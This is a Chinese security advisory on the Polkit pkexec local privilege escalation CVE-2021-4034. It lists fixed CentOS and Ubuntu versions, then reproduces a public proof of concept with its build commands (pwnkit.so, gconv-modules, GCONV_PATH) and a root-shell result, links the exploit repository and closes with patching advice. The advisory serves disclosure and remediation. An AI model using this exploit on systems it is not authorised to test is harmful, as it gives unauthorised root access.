漏洞描述

Polkit是用于在Linux操作系统中控制系统范围特权的组件。它为非特权进程提供了与特权进程进行通信的有组织的方式。类似“sudo”的用法。

CVE-2021-4034

polkit的pkexec存在本地权限提升漏洞,已获得普通权限的攻击者可通过此漏洞获取root权限。

该漏洞CVSS评分:7.8,

危害等级:高危漏洞利用难度低,最早引入问题的commit来自2009年,影响版本范围远超去年的sudo漏洞。漏洞作者在Ubuntu、Debian、Fedora和CentOS的默认安装环境上均测试通过。

影响范围

影响版本:由于polkit为系统预装工具,目前主流Linux版本均受影响。

修复版本:

CentOS系列:

CentOS 6:polkit-0.96-11.el6_10.2

CentOS 7:polkit-0.112-26.el7_9.1

CentOS 8.0:polkit-0.115-13.el8_5.1

CentOS 8.2:polkit-0.115-11.el8_2.2

CentOS 8.4:polkit-0.115-11.el8_4.2

Ubuntu系列:

Ubuntu 20.04 LTS:policykit-1 - 0.105-26ubuntu1.2

Ubuntu 18.04 LTS:policykit-1 - 0.105-20ubuntu0.18.04.6

Ubuntu 16.04 ESM:policykit-1 - 0.10514.1ubuntu0.5+esm1

Ubuntu 14.04 ESM:policykit-1 - 0.105-4ubuntu3.14.04.6+esm1

漏洞复现

下载poc,进入poc目录,编译,运行。

vagrant@ubuntu-impish:~/CVE-2021-4034$ make

cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c

cc -Wall cve-2021-4034.c -o cve-2021-4034

echo “module UTF-8// PWNKIT// pwnkit 1” > gconv-modules

mkdir -p GCONV_PATH=.

cp /usr/bin/true GCONV_PATH=./pwnkit.so:.

vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034

whoami
root
exit

poc地址

https://github.com/berdav/CVE-2021-4034

修复建议

参考漏洞影响范围,及时升级至最新安全版本。
总结和参考

1、及时安装安全软件,关闭不需要的服务和端口。

2、开启系统防火墙。

3、及时升级系统或者软件的版本。

Linux Polkit本地权限提升漏洞(CVE-2021-4034)相关推荐

  1. Linux Polkit 中的pkexec 组件存在的本地权限提升漏洞(CVE-2021-4034)修复方法及centos6和centos7的安装包

    近日安全监测发现Linux Polkit 中的pkexec 组件存在的本地权限提升漏洞(CVE-2021-4034),pkexec应用程序为 Linux 系统预装工具,漏洞影响Ubuntu.Debia ...

  2. CVE-2021-33909:Linux本地权限提升漏洞

    Linux本地权限提升漏洞影响大多数Linux发行版. 漏洞概述 Qualys研究人员在Linux kernel中发现一个本地权限提升漏洞--Sequoia,该漏洞是Linux kernel文件系统层 ...

  3. Linux Kernel ‘CLONE_NEWUSER|CLONE_FS’本地权限提升漏洞

    漏洞名称: Linux Kernel 'CLONE_NEWUSER|CLONE_FS'本地权限提升漏洞 CNNVD编号: CNNVD-201303-281 发布时间: 2013-03-15 更新时间: ...

  4. CentOS升级polkit版本,解决 Linux Polkit 存在权限提升的漏洞 (CVE-2021-4034)

    CentOS升级polkit版本 漏洞描述 影响范围 参考安全版本 演示环境检查 离线升级操作 在线升级操作 漏洞描述 受影响版本的 pkexec 无法正确处理调用参数计数,最终尝试将环境变量作为命令 ...

  5. linux系统中acpid的作用,ACPID电源按钮事件本地权限提升漏洞

    发布日期:2011-12-08 更新日期:2012-08-21 受影响系统: acpid acpid 2.0.10 acpid acpid 1.0.8 acpid acpid 1.0.3 acpid ...

  6. MICROSOFT TEAMS MACOS版本本地权限提升漏洞

    Offensive Security安全研究人员在Microsoft Teams的XPC 服务中发现了一个安全漏洞,并将漏洞报告给了MSRC,微软确认了该漏洞但决定不立即修复. 漏洞根源分析 漏洞是两 ...

  7. linux 修改驱动权限,Linux Kernel 'MSR' 驱动程序本地权限提升漏洞

    发布日期:2013-02-07 更新日期:2013-03-05 受影响系统: Linux kernel 2.6.x 描述: -------------------------------------- ...

  8. linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...

    0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...

  9. Polkit权限提升漏洞(CVE-2021-4034)利用及修复

    Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 文章目录 Polkit本地权限提升漏洞(CVE-2021-4034)利用及修复 漏洞说明 危害等级 影响版本 修复版本 漏洞利用 ...

最新文章

  1. 机器学习的门槛再度降低,AI小白如何用5分钟搞定建模?
  2. 普元eos开发手册_名词解释--统一应用(开发)平台Unified Application Platform
  3. ue查找多个关键字_聊聊数据库GROUP BY关键字的那些事
  4. 【深度学习】深入浅出神经网络框架的模型元件(池化、正则化和反卷积层)
  5. 白话设计模式——目录
  6. 【大数据、数据挖掘、数据分析】用户画像是什么?如何制作用户画像?
  7. linux三剑客试题,linux三剑客-awk
  8. spring mvc4 笔记
  9. 算法学习:最近公共祖先
  10. Day 16 包 json模块和os模块
  11. Java核心类库篇4——集合
  12. 01【C3D 行为识别】项目下载 环境配置 数据集转化视频帧 UCF101数据集处理
  13. ps中基色 混合色 结果色是什么
  14. 用好这 42 款 Chrome 插件,每年轻松省出一个年假
  15. 原生javascript-图片爆炸的效果
  16. 退出计算机用户的快捷方式,如何注销计算机或从Windows 10注销
  17. 本题要求实现一个函数,输出n行空心的数字金字塔。
  18. Origin Pro2017使用PatchOriginPro.exe破解提示Patch unsuccessfully or already
  19. 小米诚意之作:骁龙8Gen1+IMX766+OIS+120Hz,已跌至两千元档
  20. Surface RT2使用情况

热门文章

  1. 智掌柜带你了解餐饮点菜系统的功能,快来看看吧~
  2. linux需要wifi网络认证,无线802.1x认证简介及配置方法
  3. vsphere之vmotion精华
  4. Android开发高手课笔记 - 01 崩溃优化(上):关于“崩溃”那点事
  5. 无法访问计算机请检查名称的拼写,Win7系统访问共享文件夹提示“请检查名称的拼写”的解决方法...
  6. 拯救者Y7000关闭的流程
  7. java计算机毕业设计新疆旅游专列订票系统源码+mysql数据库+lw文档+系统+调试部署
  8. 服务器无法显示url,遇到“您所请求的网址(URL)无法获取”的解决办法
  9. 专访民生银行:CPOS平台如何从线下布局移动支付
  10. Ruby使用RabbitMQ(基础)